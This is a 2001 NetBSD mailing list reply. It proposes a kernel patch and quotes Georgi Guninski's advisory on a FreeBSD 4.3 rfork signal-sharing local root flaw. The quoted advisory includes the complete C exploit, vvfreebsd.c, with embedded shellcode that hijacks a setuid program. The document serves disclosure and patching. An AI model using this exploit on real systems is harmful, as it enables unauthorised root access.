Subject: Re: [Fwd: FreeBSD 4.3 local root, yet Linux and *BSD much better
To: Emre Yildirim <emre@UNIX.US.EU.ORG>
From: Matthew Orgass <darkstar@pgh.net>
List: netbsd-users
Date: 07/11/2001 04:26:17
On Tue, 10 Jul 2001, Emre Yildirim wrote:
> Is NetBSD vulnerable to this?
NetBSD itself did not have a rfork equivalent call until a week or so
ago (in -current), however an equivalent call is in linux compatibility in
1.5.x which is enabled in GENERIC on i386 (and probably some other archs
too). I don't know what other emulations, if any, have equivalent calls.
FreeBSD emulation does not include rfork. When Linux emulation is
enabled, NetBSD 1.5.x is vulnerable. Note that the actual exploit for
NetBSD is somewhat different due to the difference in thread primitives.
The following patch should fix the problem (untested, apply in sys/kern):
--- kern_descrip.c.orig Wed Jul 11 03:10:36 2001
+++ kern_descrip.c Wed Jul 11 03:27:44 2001
@@ -1382,6 +1382,9 @@
struct filedesc *fdp = p->p_fd;
int fd;
+ fdunshare(p);
+ cwdunshare(p);
+
for (fd = 0; fd <= fdp->fd_lastfile; fd++)
if (fdp->fd_ofileflags[fd] & UF_EXCLOSE)
(void) fdrelease(p, fd);
--- kern_sig.c.orig Wed Jul 11 03:23:45 2001
+++ kern_sig.c Wed Jul 11 03:26:17 2001
@@ -336,6 +336,8 @@
int signum;
int prop;
+ sigactsunshare(p);
+
/*
* Reset caught signals. Held signals remain held
* through p_sigmask (unless they were caught,
Matthew Orgass
darkstar@pgh.net
> -------- Original Message --------
> Subject: FreeBSD 4.3 local root, yet Linux and *BSD much better than Windows
> From: Georgi Guninski <guninski@guninski.com>
> To: bugtraq@securityfocus.com
>
>
> Georgi Guninski security advisory #48, 2001
>
> FreeBSD 4.3 local root, yet Linux and *BSD much better than Windows
>
> Systems affected:
> FreeBSD 4.3 and probably earlier versions.
>
> Risk: High
> Date: 10 July 2001
>
> Legal Notice:
> This Advisory is Copyright (c) 2001 Georgi Guninski.
> You may distribute it unmodified.
> You may not modify it and distribute it or distribute parts
> of it without the author's written permission.
>
> Disclaimer:
> The information in this advisory is believed to be true based on
> experiments though it may be false.
> The opinions expressed in this advisory and program are my own and not of
> any company. The usual standard disclaimer applies,
> especially the fact that Georgi Guninski is not liable for any damages
> caused by direct or indirect use of the information or functionality
> provided by this advisory or program. Georgi Guninski bears no
> responsibility for content or misuse of this advisory or program or any
> derivatives thereof.
>
>
> Description:
>
> There is local root compromise in FreeBSD 4.3 due to design flaw
> which allows injecting signal handlers in other processes.
>
>
> Details:
> The problem is rfork(RFPROC|RFSIGSHARE) which shares the signal
> handlers.
> If the child does exec() on a setuid program and then the parent set a
> signal handler, the signal handler is replicated in the child.
> The address of the signal handler may be in the environment and after
> sending
> a signal to the child our signal handler gets executed.
> Examine the code for more information.
>
>
>
> Exploit:
>
> Examine the source and don't send me mail if you get SEGV.
> http://www.guninski.com/vvfreebsd.c
>
> -------------vvfreebsd.c----------------------
>
> /*
> FreeBSD 4.3 local root exploit using shared signals.
> Written by Georgi Guninski http://www.guninski.com
> */
>
> #include <stdio.h>
> #include <signal.h>
> #include <unistd.h>
> int vv1;
>
> #define MYSIG SIGINT
>
>
> //exec "/tmp/sh", shellcode gotten from the internet and modified
> unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x31\xc0\x50\x50\xb0\xb7\xcd\x80"
> "\x31\xc0\x50\x50\xb0\x17\xcd\x80"
> "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
> "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"
> "\xb0\x3b\x50\xcd\x80\x90\x90\x90";
>
> typedef (*PROG)();
> extern char **environ;
>
> int main(int ac,char **av)
> {
> int pid;
> //(*(PROG)bsdshell)();
> if(!(vv1=getenv("vv")))
> {
> setenv("vv",bsdshell,1);
> if(!execle(av[0],"vv",NULL,environ))
> {
> perror("weird exec");
> exit(1);
> }
> }
>
> printf("vvfreebsd. Written by Georgi Guninski\n");
> printf("shall jump to %x\n",vv1);
>
> if(!(pid=rfork(RFPROC|RFSIGSHARE)))
> {
> printf("child=%d\n",getpid());
> // /usr/bin/login and rlogin work for me. ping gives nonsuid shell //
> if(!execl("/usr/bin/rlogin","rlogin","localhost",0))
> if(!execl("/usr/bin/login","login",0))
> {
> perror("exec setuid failed");
> exit(2);
> };
> }
> sleep(2);
> signal(MYSIG,(sig_t)vv1);
> sleep(2);
> kill(pid,MYSIG);
> printf("done\n");
> while(42);
> }
>
>
>
>
> ----------------------------------------------
>
> Workaround/Soltution:
> As far as I know patches for this problem are commited for both
> -current and -stable.
> >From "CVS log for src/sys/kern/kern_exec.c"
> [MFC: do not share sigs after an exec]
> The main diff seems to be at:
> http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/kern/kern_exec.c.diff?
> r1=1.107.2.7&r2=1.107.2.8&f=h
>
> Vendor status:
> FreeBSD was informed on 2 July 2001 (sent them broken attachment on 1
> July).
>
> Some comparison of vendor response times from my personal experience:
> FreeBSD seem to have fixed this in 7 days.
> OpenBSD fixed my previous advisory in 6 days.
> Microsoft are much slower.
>
> Regards,
> Georgi Guninski
> http://www.guninski.com
>
>
>